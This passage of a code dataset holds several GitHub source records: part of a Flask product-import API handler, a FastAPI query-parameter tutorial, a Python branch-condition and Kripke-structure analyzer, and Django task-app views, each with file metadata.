not in ids:\n ids.add(new_id)\n return False\n info_log.warning(\n f'POST:/imports В 1 запросе не 
может быть дубликатов id={ids} + {new_id}, 400', )\n return True\n\n\ndef main_handler_item(item: dict, update_date: datetime) -> int:\n '''\n Основная функция обработки валидной item и валидной update_date\n '''\n new_parent_id = value_or_none(dict_=item, key_='parentId')\n new_price = value_or_none(dict_=item, key_='price')\n\n node = ShopUnit.query.filter_by(id=item['id']).first()\n type_obj = ShopUnitType.query.filter_by(type=item['type']).first()\n new_type = type_obj.type\n\n if not check_type_context(type_obj.type, new_price):\n return response_error_400()\n\n if node is not None:\n # Если уже есть в базе такой id, значения нужно обновить запись\n if node.type != new_type:\n return 400\n old_parent_id = node.parentId\n update_node(node_id=item['id'], parentId=new_parent_id, name=item['name'],\n type_=new_type, price=new_price, time_=update_date, old_parentId=old_parent_id, )\n if old_parent_id is not None:\n #обновляем старого родителя (время)\n update_date_parent(old_parent_id, time_update=update_date)\n else:\n # иначе создаем новую запись\n add_node(node_id=item['id'], parentId=new_parent_id, name=item['name'], type_=new_type,\n price=new_price, time_=update_date)\n\n if new_parent_id is not None:\n # обновляем нового родителя (время)\n update_date_parent(new_parent_id, time_update=update_date)\n return 200\n\n\n@bp_imports.route('/imports', methods=['POST'])\ndef imports():\n '''\n Обработчик для импортирования новых товаров и/или категорий.\n '''\n\n info_log.info('handler:POST:/imports ')\n if not request.is_json:\n info_log.warning(f'handler:POST:/imports это не json')\n return response_error_400()\n\n data = request.get_json()\n\n if not valid_request_json(data, TIME_FORMAT):\n return response_error_400()\n\n update_date = datetime.datetime.strptime(data['updateDate'], TIME_FORMAT)\n update_date = update_date.isoformat()\n\n ids = set()\n for item in data['items']:\n if (not valid_structure_item(item)) or (not valid_item(item)) or (id_duplicate(ids, item['id'])):\n return response_error_400()\n if main_handler_item(item=item, update_date=update_date) != 200:\n info_log.warning('handler:POST:/imports Нельзя менять типы')\n return response_error_400()\n\n save_request_fact(ids, update_date)\n db.session.commit()\n return '', 200\n", "repo_name": "Alset-Nikolas/RestApiServis", "sub_path": "app/paths/imports.py", "file_name": "imports.py", "file_ext": "py", "file_size_in_byte": 11369, "program_lang": "python", "lang": "ru", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "flask.Blueprint", "line_number": 14, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 25, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 25, "usage_type": "name"}, {"api_name": "my_logs.logg.warning_log.warning", "line_number": 26, "usage_type": "call"}, {"api_name": "my_logs.logg.warning_log", "line_number": 26, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 31, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 31, "usage_type": "attribute"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 34, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 34, "usage_type": "name"}, {"api_name": "my_logs.logg.warning_log.warning", "line_number": 35, "usage_type": "call"}, {"api_name": "my_logs.logg.warning_log", "line_number": 35, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query.filter_by", 
"line_number": 43, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query", "line_number": 43, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 43, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 57, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 57, "usage_type": "name"}, {"api_name": "my_logs.logg.warning_log.warning", "line_number": 58, "usage_type": "call"}, {"api_name": "my_logs.logg.warning_log", "line_number": 58, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 70, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 70, "usage_type": "name"}, {"api_name": "my_logs.logg.warning_log.warning", "line_number": 71, "usage_type": "call"}, {"api_name": "my_logs.logg.warning_log", "line_number": 71, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 75, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 75, "usage_type": "name"}, {"api_name": "my_logs.logg.warning_log.warning", "line_number": 76, "usage_type": "call"}, {"api_name": "my_logs.logg.warning_log", "line_number": 76, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query.filter_by", "line_number": 92, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query", "line_number": 92, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 92, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 107, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 107, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 112, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 112, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitStatistic.ShopUnitStatistic.query.filter_by", "line_number": 124, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnitStatistic.ShopUnitStatistic.query", "line_number": 124, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnitStatistic.ShopUnitStatistic", "line_number": 124, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitStatistic.ShopUnitStatistic", "line_number": 126, "usage_type": "call"}, {"api_name": "db.db.session.add", "line_number": 129, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 129, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 129, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.info", "line_number": 131, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 131, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 138, "usage_type": "call"}, {"api_name": "db.db.session.add", "line_number": 144, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 144, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 144, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.info", "line_number": 149, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 149, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query.filter_by", "line_number": 160, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query", "line_number": 160, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", 
"line_number": 160, "usage_type": "name"}, {"api_name": "db.db.session.add", "line_number": 163, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 163, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 163, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitImport.ShopUnitImport.query.filter_by", "line_number": 173, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnitImport.ShopUnitImport.query", "line_number": 173, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnitImport.ShopUnitImport", "line_number": 173, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitImport.ShopUnitImport", "line_number": 175, "usage_type": "call"}, {"api_name": "db.db.session.add", "line_number": 180, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 180, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 180, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitImportRequest.ShopUnitImportRequest", "line_number": 187, "usage_type": "call"}, {"api_name": "db.db.session.add", "line_number": 190, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 190, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 190, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query.filter_by", "line_number": 198, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query", "line_number": 198, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 198, "usage_type": "name"}, {"api_name": "base_function.delete_child", "line_number": 200, "usage_type": "call"}, {"api_name": "db.db.session.add", "line_number": 206, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 206, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 206, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.info", "line_number": 211, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 211, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 224, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 224, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query.filter_by", "line_number": 236, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnit.ShopUnit.query", "line_number": 236, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnit.ShopUnit", "line_number": 236, "usage_type": "name"}, {"api_name": "components.schemas.ShopUnitType.ShopUnitType.query.filter_by", "line_number": 237, "usage_type": "call"}, {"api_name": "components.schemas.ShopUnitType.ShopUnitType.query", "line_number": 237, "usage_type": "attribute"}, {"api_name": "components.schemas.ShopUnitType.ShopUnitType", "line_number": 237, "usage_type": "name"}, {"api_name": "base_function.response_error_400", "line_number": 241, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log.info", "line_number": 270, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 270, "usage_type": "name"}, {"api_name": "flask.request.is_json", "line_number": 271, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 271, "usage_type": "name"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 272, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 272, "usage_type": "name"}, {"api_name": "base_function.response_error_400", "line_number": 273, 
"usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 275, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 275, "usage_type": "name"}, {"api_name": "base_function.TIME_FORMAT", "line_number": 277, "usage_type": "argument"}, {"api_name": "base_function.response_error_400", "line_number": 278, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 280, "usage_type": "call"}, {"api_name": "base_function.TIME_FORMAT", "line_number": 280, "usage_type": "argument"}, {"api_name": "datetime.datetime", "line_number": 280, "usage_type": "attribute"}, {"api_name": "base_function.response_error_400", "line_number": 286, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log.warning", "line_number": 288, "usage_type": "call"}, {"api_name": "my_logs.logg.info_log", "line_number": 288, "usage_type": "name"}, {"api_name": "base_function.response_error_400", "line_number": 289, "usage_type": "call"}, {"api_name": "db.db.session.commit", "line_number": 292, "usage_type": "call"}, {"api_name": "db.db.session", "line_number": 292, "usage_type": "attribute"}, {"api_name": "db.db", "line_number": 292, "usage_type": "name"}]}
+{"seq_id": "11443707863", "text": "'''\n _oo0oo_\n o8888888o\n 88\" . \"88\n (| -_- |)\n 0\\ = /0\n ___/`---'\\___\n .' \\\\| |// '.\n / \\\\||| : |||// \\\n / _||||| -:- |||||- \\\n | | \\\\\\ - /// | |\n | \\_| ''\\---/'' |_/ |\n \\ .-\\__ '-' ___/-. /\n ___'. .' /--.--\\ `. .'___\n .\"\" '< `.___\\_<|>_/___.' >' \"\".\n | | : `- \\`.;`\\ _ /`;.`/ - ` : | |\n \\ \\ `_. \\_ __\\ /__ _/ .-` / /\n =====`-.____`.___ \\_____/___.-`___.-'=====\n `=---='\n\n\n ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\n 佛祖保佑 永不宕机 永无BUG\n'''\n# -*- coding: utf-8 -*-\n# @Project : FastAPIBook\n# @File Name : 8_query_parameters.py\n# @Author : liushuangdan \n# @Date : 2020/7/17 16:16\n# @IDE : PyCharm\nfrom fastapi import FastAPI\n\n\napp = FastAPI()\nfake_item_db = [{\"item_name\": \"Foo\"}, {\"item_name\": \"Bar\"}, {\"item_name\": \"Baz\"}]\n\n\n@app.get(\"/items\")\nasync def read_item(skip: int = 0, limit: int = 10):\n '''\n @description: \n @param {type} \n @return: \n ''' \n return fake_item_db[skip : skip + limit]\n\n\n@app.get(\"/i/\")\nasync def i(A: str = \"HI...\", B: str = \"Hello, jack\", C: str = \"He..\"):\n return {\"cc\": A+B+C}, {\"dd\": B+C}\n\n\n@app.get(\"ii\")\nasync def ii(A: int = 0, B: int = 10, C: int = 20):\n return {\"cc\": A+B+C}, {\"dd\": B+C}\n\n\n@app.get(\"iii\")\nasync def iii(A: int = 0, B: int = 10, C: int = 20):\n return \"A+B+C\", A+B+C\n\n\n# bool 类型强制转换\n@app.get(\"/xxx/{item_id}\")\nasync def xxx(item_id: str, QQ: str = None, SS: bool = False):\n '''\n @description: \n @param {type}:\n QQ 为 选填参数。\n item_id 为必填参数。\n SS: 为选填参数。 \n @return: \n '''\n item = {\"item_id\": item_id}\n if QQ:\n item.update(\n {\"QQ\": QQ}\n )\n if not SS:\n item.update(\n {\"item_id\": \"This is SSSSSSS(n个s)\"}\n )\n return item\n\n\n# 多路径 和 查询参数 和 必填字段\n@app.get(\"/user/{user_id}/item/{item_id}\")\nasync def read_user_item(\n user_id: int, item_id: str, q: str = None, short: bool = False\n):\n item = {\"item_id\": item_id, \"owner_id\": user_id}\n if q:\n item.update(\n {\"q\": q}\n )\n if not short:\n item.update(\n {\"description\": \"This is an amazing item that has a long description\"}\n )\n return item \n\n\nif __name__ == \"__main__\":\n import uvicorn\n uvicorn.run(app, host=\"127.0.0.1\", port=8000)\n\n", "repo_name": "liushuangdan/FastAPIStudy", "sub_path": "src/FastAPIBook/step2_api/8_query_parameters.py", "file_name": "8_query_parameters.py", "file_ext": "py", "file_size_in_byte": 2677, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fastapi.FastAPI", "line_number": 35, "usage_type": "call"}, {"api_name": "uvicorn.run", "line_number": 106, "usage_type": "call"}]}
+{"seq_id": "15515001302", "text": "from __future__ import annotations\n\nimport ast\nimport inspect\nfrom dataclasses import dataclass\nfrom enum import Enum, auto\nfrom functools import reduce\nfrom typing import Any, Callable, Sequence, cast\n\nfrom .instrumentation import variable_name\nfrom .kripke import Kripke, State\n\n\nclass Comparison(Enum):\n \"\"\"Representation of the comparison operators <=, >=\n\n This class is confined to the operators that include equality because they are the easiest to\n support as STL formulas.\n\n Attributes:\n LTE: less than or equal to operator\n GTE: greater than or equal to operator\n \"\"\"\n\n LTE = auto()\n GTE = auto()\n\n def inverse(self) -> Comparison:\n \"\"\"Invert the comparion.\n\n Returns:\n The inverse comparison operator\n \"\"\"\n\n if self is Comparison.LTE:\n return Comparison.GTE\n\n if self is Comparison.GTE:\n return Comparison.LTE\n\n raise ValueError(f\"Unknown comparison type {self}\")\n\n @staticmethod\n def from_op(node: ast.cmpop) -> Comparison:\n \"\"\"Create a comparison from an AST node.\n\n Args:\n op: The AST comparison operator node\n\n Returns:\n The comparison operator of the node\n\n Raises:\n TypeError: If op is not an AST comparison node\n \"\"\"\n\n if isinstance(node, ast.LtE):\n return Comparison.LTE\n\n if isinstance(node, ast.GtE):\n return Comparison.GTE\n\n raise TypeError(f\"Unsupported comparison operator {node}\")\n\n\nclass InvalidConditionExpression(Exception):\n # pylint: disable=C0115\n pass\n\n\ndef _cmp_nonstrict(left: float, cmp: Comparison, right: float) -> bool:\n if cmp is Comparison.LTE:\n return left <= right\n\n if cmp is Comparison.GTE:\n return left >= right\n\n raise TypeError(f\"Unknown comparison {type(cmp)}\")\n\n\ndef _cmp_strict(left: float, cmp: Comparison, right: float) -> bool:\n if cmp is Comparison.LTE:\n return left < right\n\n if cmp is Comparison.GTE:\n return left > right\n\n raise TypeError(f\"Unknown comparison {type(cmp)}\")\n\n\n@dataclass\nclass Condition:\n \"\"\"Representation of the boolean expression of a conditional statement.\n\n This representation assumes that the condition is represented as an inequality, with a variable\n on at least one side of the equation.\n\n Attributes:\n variable: The name of the variable on the left side of the comparison\n comparison: The comparison operator\n bound: The value or variable on the right side of the comparison\n strict: Whether the inequality is strict (<, >) or nonstrict (<=,>=)\n\n \"\"\"\n\n variable: str\n comparison: Comparison\n bound: str | float\n strict: bool = False\n\n def inverse(self) -> Condition:\n \"\"\"Invert the condition.\n\n If the condition is nonstrict, its inverse will be strict and vice versa. 
This function\n        returns a new Condition instance rather than modifying the existing one.\n\n        Returns:\n            A new Condition with the comparison inverted\n        \"\"\"\n        return Condition(self.variable, self.comparison.inverse(), self.bound, not self.strict)\n\n    def is_true(self, variables: dict[str, float]) -> bool:\n        \"\"\"Check if a condition is true given a set of variables.\n\n        If a variable is not present in the map, then the condition is assumed to be false.\n\n        Args:\n            variables: Mapping from variable names to values\n\n        Returns:\n            True if the condition is true, False otherwise\n\n        Raises:\n            ValueError: If the value in the comparison attribute is not the Comparison type\n        \"\"\"\n\n        try:\n            left = variables[self.variable]\n        except KeyError:\n            return False\n\n        try:\n            right = variables[self.bound] if isinstance(self.bound, str) else self.bound\n        except KeyError:\n            return False\n\n        if self.strict:\n            return _cmp_strict(left, self.comparison, right)\n\n        return _cmp_nonstrict(left, self.comparison, right)\n\n    @property\n    def variables(self) -> set[str]:\n        \"\"\"The set of variables depended on by the condition.\"\"\"\n\n        if isinstance(self.bound, str):\n            return {self.variable, self.bound}\n\n        return {self.variable}\n\n    @classmethod\n    def from_expr(cls, expr: ast.expr) -> Condition:\n        \"\"\"Create a Condition from an AST expression node.\n\n        This class method assumes that the comparison expression only has a single operand. This is\n        not always the case in Python as the expression \"10 <= x <= 20\" is a valid comparison and\n        is represented by having several operands in the expression AST node.\n\n        Args:\n            expr: The AST expression node\n\n        Returns:\n            A Condition instance representing the AST comparison expression\n\n        Raises:\n            InvalidConditionExpression: If the expr value is not an ast.Compare type\n            TypeError: If the expression does not conform to the condition assumptions\n        \"\"\"\n\n        if not isinstance(expr, ast.Compare):\n            raise InvalidConditionExpression(f\"Unsupported expression type {type(expr)}\")\n\n        left = expr.left\n        comparison = Comparison.from_op(expr.ops[0])\n        right = expr.comparators[0]\n        variable_nodes = (ast.Name, ast.Attribute)\n\n        if isinstance(left, variable_nodes) and isinstance(right, variable_nodes + (ast.Constant,)):\n            if isinstance(right, variable_nodes):\n                return cls(variable_name(left), comparison, variable_name(right))\n\n            if isinstance(right, ast.Constant) and isinstance(right.value, (int, float)):\n                return cls(variable_name(left), comparison, float(right.value))\n\n            raise TypeError(f\"Invalid bound type {type(right)}\")\n\n        if isinstance(left, ast.Constant) and isinstance(right, variable_nodes):\n            if not isinstance(left.value, (int, float)):\n                raise TypeError(f\"Invalid bound type {type(right)}\")\n\n            return cls(variable_name(right), comparison.inverse(), float(left.value))\n\n        raise TypeError(\"Invalid comparison expression\")\n\n    @classmethod\n    def lt(cls, variable: str, bound: str | float, *, strict: bool = False) -> Condition:\n        return cls(variable, Comparison.LTE, bound, strict)\n\n    @classmethod\n    def gt(cls, variable: str, bound: str | float, *, strict: bool = False) -> Condition:\n        return cls(variable, Comparison.GTE, bound, strict)\n\n\n@dataclass\nclass BranchTree:\n    \"\"\"Representation of a tree of conditional blocks.\n\n    A tree represents an independent conditional statement i.e. a single if-else block. 
This tree\n    has two sets of children, one of the conditional statements found in the true block of the\n    conditional statement, and one of the conditional statements found in the false block.\n\n    Attributes:\n        condition: The boolean guard of the conditional block\n        true_children: Sub-trees found in the block associated with the condition being true\n        false_children: Sub-trees found in the block associated with the condition being false\n    \"\"\"\n\n    condition: Condition\n    true_children: list[BranchTree]\n    false_children: list[BranchTree]\n\n    def as_kripke(self) -> list[Kripke[Condition]]:\n        \"\"\"Convert tree of conditions into a Kripke Structure.\"\"\"\n\n        if len(self.true_children) == 0:\n            true_kripkes = [Kripke.singleton([self.condition])]\n        else:\n            true_kripkes = [\n                kripke.add_labels([self.condition])\n                for child in self.true_children\n                for kripke in child.as_kripke()\n            ]\n\n        inv_cond = self.condition.inverse()\n\n        if len(self.false_children) == 0:\n            false_kripkes = [Kripke.singleton([inv_cond])]\n        else:\n            false_kripkes = [\n                kripke.add_labels([inv_cond])\n                for child in self.false_children\n                for kripke in child.as_kripke()\n            ]\n\n        return [tk.join(fk) for tk in true_kripkes for fk in false_kripkes]\n\n    @property\n    def variables(self) -> set[str]:\n        \"\"\"The set of variables depended on by the tree, including its children.\"\"\"\n\n        variables = self.condition.variables\n\n        for child in self.true_children:\n            variables = variables.union(child.variables)\n\n        for child in self.false_children:\n            variables = variables.union(child.variables)\n\n        return variables\n\n    @staticmethod\n    def from_function(func: Callable[..., Any]) -> list[BranchTree]:\n        \"\"\"Create a set of BranchTrees from an arbitrary python function.\n\n        The set of BranchTrees that represent all of the independent conditional statements in the\n        function body. In other words, the size of the output set should be the same as the number\n        of independent if-else blocks in the function. In order to analyze this function, the\n        python source of the function should be available.\n\n        Args:\n            func: The python function to analyze\n\n        Returns:\n            A set of BranchTrees representing all independent conditional statements in the function\n\n        Raises:\n            OSError: If the source code of the function is not available\n        \"\"\"\n\n        mod_def = ast.parse(inspect.getsource(func))\n        func_def = cast(ast.FunctionDef, mod_def.body[0])\n        return _block_trees(func_def.body)\n\n\ndef _expr_trees(expr: ast.expr, tcs: list[BranchTree], fcs: list[BranchTree]) -> list[BranchTree]:\n    \"\"\"Create a set of BranchTrees from a conditional statement expression.\n\n    This function generates a set of trees in order to handle the cases in which the conditional\n    statement expression contains either a boolean conjunction or disjunction operator. In the\n    case of the conjunction, we traverse the set of operands generating a new tree with the operand\n    as the condition and the previous tree as a true child. 
In the case of disjunction, we traverse\n the set of operands and create a new tree for each operand with the same children for each.\n\n Args:\n expr: The conditional statement expression\n tcs: The set of BranchTrees generated from the true block body\n fcs: The set of BranchTrees generated from the false block body\n\n Returns:\n A set of BranchTrees created from the expression\n\n Raises:\n TypeError: If the condition expression node is not a supported type\n \"\"\"\n # pylint: disable=W0105\n\n if not isinstance(expr, ast.BoolOp):\n condition = Condition.from_expr(expr)\n tree = BranchTree(condition, tcs, fcs)\n return [tree]\n\n if isinstance(expr.op, ast.And):\n \"\"\"In this case, we compose a single tree by iteratively stacking BranchTrees for each\n operand. We explore this approach in the following example.\n\n Given the following condition:\n\n if x <= 5 and y <= 10:\n do_true()\n else:\n do_false()\n\n We can see that this can be re-written as the following:\n\n if x <= 5:\n if y <= 10:\n do_true()\n else:\n do_false()\n else:\n do_false()\n\n The re-written condition can now be analyzed recursively to produce a BranchTree.\n \"\"\"\n\n init = _expr_trees(expr.values[-1], tcs, fcs)\n trees = reduce(lambda ts, e: _expr_trees(e, ts, []), reversed(expr.values[:-1]), init)\n return list(trees)\n\n if isinstance(expr.op, ast.Or):\n \"\"\"In this case, we create a set of trees by iterating over the set of operands and\n creating new trees with the same children. Consider the following example.\n\n Given the following condition:\n\n if x <= 5 or y <= 10:\n do_true()\n else:\n do_false()\n\n This can be re-written as the following:\n\n if x <= 5:\n do_true()\n else:\n do_false()\n\n if y <= 10:\n do_true()\n else:\n do_false()\n\n The re-written condition can now be analyzed into a set of independent BranchTrees.\n \"\"\"\n\n return [tree for e in expr.values for tree in _expr_trees(e, tcs, fcs)]\n\n raise TypeError(f\"Unsupported expression type {type(expr)}\")\n\n\ndef _block_trees(block: Sequence[ast.stmt]) -> list[BranchTree]:\n \"\"\"Create a set of trees from a block of python statements.\n\n Each BranchTree in the set represents an independent conditional statement in the block. 
The\n true and false blocks of each statement are recursively analyzed to find the child BranchTrees.\n\n Args:\n block: The set of python statements in the block\n\n Returns:\n A set of BranchTrees representing the independent conditional statements in the block\n \"\"\"\n\n block_trees = []\n conditions = [stmt for stmt in block if isinstance(stmt, ast.If)]\n\n for stmt in conditions:\n true_children = _block_trees(stmt.body)\n false_chilren = _block_trees(stmt.orelse)\n\n try:\n stmt_trees = _expr_trees(stmt.test, true_children, false_chilren)\n except InvalidConditionExpression:\n pass\n else:\n block_trees.extend(stmt_trees)\n\n return block_trees\n\n\ndef active_branches(kripke: Kripke[Condition], variables: dict[str, float]) -> list[State]:\n \"\"\"Compute branches that are active given a set of variables.\n\n Args:\n kripke: The kripke structure containing states representing conditional branches\n variables: The set of variable values the state labels depend on\n\n Returns:\n The list of states that are active given the set of variables.\n \"\"\"\n\n def is_active(state: State) -> bool:\n return all(label.is_true(variables) for label in kripke.labels_for(state))\n\n return [state for state in kripke.states if is_active(state)]\n\n\n__all__ = [\"BranchTree\", \"Comparison\", \"Condition\", \"active_branches\"]\n", "repo_name": "cpslab-asu/branch-statement-analyzer", "sub_path": "src/bsa/branches.py", "file_name": "branches.py", "file_ext": "py", "file_size_in_byte": 14114, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "enum.Enum", "line_number": 14, "usage_type": "name"}, {"api_name": "enum.auto", "line_number": 25, "usage_type": "call"}, {"api_name": "enum.auto", "line_number": 26, "usage_type": "call"}, {"api_name": "ast.cmpop", "line_number": 44, "usage_type": "attribute"}, {"api_name": "ast.LtE", "line_number": 57, "usage_type": "attribute"}, {"api_name": "ast.GtE", "line_number": 60, "usage_type": "attribute"}, {"api_name": "ast.expr", "line_number": 162, "usage_type": "attribute"}, {"api_name": "ast.Compare", "line_number": 180, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 186, "usage_type": "attribute"}, {"api_name": "ast.Attribute", "line_number": 186, "usage_type": "attribute"}, {"api_name": "ast.Constant", "line_number": 188, "usage_type": "attribute"}, {"api_name": "instrumentation.variable_name", "line_number": 190, "usage_type": "call"}, {"api_name": "ast.Constant", "line_number": 192, "usage_type": "attribute"}, {"api_name": "instrumentation.variable_name", "line_number": 193, "usage_type": "call"}, {"api_name": "ast.Constant", "line_number": 197, "usage_type": "attribute"}, {"api_name": "instrumentation.variable_name", "line_number": 201, "usage_type": "call"}, {"api_name": "dataclasses.dataclass", "line_number": 91, "usage_type": "name"}, {"api_name": "kripke.Kripke.singleton", "line_number": 236, "usage_type": "call"}, {"api_name": "kripke.Kripke", "line_number": 236, "usage_type": "name"}, {"api_name": "kripke.add_labels", "line_number": 239, "usage_type": "call"}, {"api_name": "kripke.Kripke.singleton", "line_number": 247, "usage_type": "call"}, {"api_name": "kripke.Kripke", "line_number": 247, "usage_type": "name"}, {"api_name": "kripke.add_labels", "line_number": 250, "usage_type": "call"}, {"api_name": "kripke.Kripke", "line_number": 232, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 272, "usage_type": "name"}, {"api_name": 
"typing.Any", "line_number": 272, "usage_type": "name"}, {"api_name": "ast.parse", "line_number": 290, "usage_type": "call"}, {"api_name": "inspect.getsource", "line_number": 290, "usage_type": "call"}, {"api_name": "typing.cast", "line_number": 291, "usage_type": "call"}, {"api_name": "ast.FunctionDef", "line_number": 291, "usage_type": "attribute"}, {"api_name": "dataclasses.dataclass", "line_number": 214, "usage_type": "name"}, {"api_name": "ast.expr", "line_number": 295, "usage_type": "attribute"}, {"api_name": "ast.BoolOp", "line_number": 317, "usage_type": "attribute"}, {"api_name": "ast.And", "line_number": 322, "usage_type": "attribute"}, {"api_name": "functools.reduce", "line_number": 347, "usage_type": "call"}, {"api_name": "ast.Or", "line_number": 350, "usage_type": "attribute"}, {"api_name": "typing.Sequence", "line_number": 381, "usage_type": "name"}, {"api_name": "ast.stmt", "line_number": 381, "usage_type": "attribute"}, {"api_name": "ast.If", "line_number": 395, "usage_type": "attribute"}, {"api_name": "kripke.Kripke", "line_number": 411, "usage_type": "name"}, {"api_name": "kripke.State", "line_number": 422, "usage_type": "name"}, {"api_name": "kripke.labels_for", "line_number": 423, "usage_type": "call"}, {"api_name": "kripke.states", "line_number": 425, "usage_type": "attribute"}, {"api_name": "kripke.State", "line_number": 411, "usage_type": "name"}]}
+{"seq_id": "23740878730", "text": "from django.http import HttpResponseRedirect\nfrom django.shortcuts import redirect, render\nfrom django.urls import reverse\nfrom django.views.generic import TemplateView\nfrom django.views.generic import FormView\nfrom Home.forms import CustomUserCreationForm, TaskForm\nfrom django.contrib.auth import login\n\nfrom Home.models import Task\n# Create your views here.\n\nclass HomeView(TemplateView):\n template_name = \"home.html\"\n\nclass TasksView(FormView):\n template_name = \"tasks.html\"\n form_class = TaskForm\n\n def post(self, request):\n form = self.form_class(request.POST)\n if form.is_valid():\n task = form.save(commit=False)\n task.user = request.user\n task.save()\n return redirect(\"Tasks\")\n return render(request, self.template_name)\n\nclass RegisterView(FormView):\n template_name = \"registration/register.html\"\n form_class = CustomUserCreationForm\n\n def post(self, request):\n form = self.form_class(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n return redirect(\"Home\")\n\nclass MusicView(TemplateView):\n template_name = \"music.html\"\n\ndef delete(request, id):\n task = Task.objects.get(id=id)\n task.delete()\n return HttpResponseRedirect(reverse('Tasks'))", "repo_name": "Mathis-Armstrong/TaskFocus", "sub_path": "Home/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1312, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.views.generic.TemplateView", "line_number": 12, "usage_type": "name"}, {"api_name": "django.views.generic.FormView", "line_number": 15, "usage_type": "name"}, {"api_name": "Home.forms.TaskForm", "line_number": 17, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 25, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 26, "usage_type": "call"}, {"api_name": "django.views.generic.FormView", "line_number": 28, "usage_type": "name"}, {"api_name": "Home.forms.CustomUserCreationForm", "line_number": 30, "usage_type": "name"}, {"api_name": "django.contrib.auth.login", "line_number": 36, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 37, "usage_type": "call"}, {"api_name": "django.views.generic.TemplateView", "line_number": 39, "usage_type": "name"}, {"api_name": "Home.models.Task.objects.get", "line_number": 43, "usage_type": 